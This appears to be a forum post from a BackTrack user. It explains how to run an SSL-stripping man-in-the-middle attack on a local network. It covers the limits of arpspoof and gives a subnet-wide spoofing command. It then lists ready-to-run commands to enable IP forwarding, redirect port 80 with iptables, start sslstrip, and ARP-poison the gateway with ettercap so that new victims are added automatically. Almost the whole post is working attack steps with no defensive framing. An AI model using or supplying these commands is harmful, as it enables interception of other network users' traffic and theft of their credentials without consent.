There are a couple of posts in here about using SSLstrip with arpspoof. This is working fine with my BT3 box but it has some drawbacks

1- Arpspoof works on one target at a time, so if you are on a busy DHCP network, you have to use something like "netdiscover" in the passive mode and manually arpspoof new targets on the run.

2-You can use:

# arpspoof -i eth0 -t 192.168.0.255 192.168.0.1

where you arp spoof the whole C class of your subnet but guess what? The gateway will display an IP conflict warining message.

3- Arpspoof is compiled with "eth0" as the device to use, even if you use "-i eth1" the attack will fail. You have to modify the arp.c file and compile arpspoof again to make it work on other NIC names or search for a compiled binary that has this issue resolved...

I would suggest following the following steps ( from the readme file included with the sslstrip package)

a)Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward

b) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>

c) Run sslstrip with the command-line options you'd like.
python sslstrip.py -k -p -l <yourListenPort>

And instead of using arpsoof use ettercap

d) Run ettercap to redirect traffic to your machine
ettercap -i eth1 -Tq -M ARP /192.168.0.1/ // // -P autoadd

We are telling ettercap to use "eth1", with terminal and quiet mode "-Tq" and use the arp poisoning attack "-M ARP". 192.168.0.1 is the gateway IP address and finally we are using the plugin autoadd to add new targets "-P autoadd".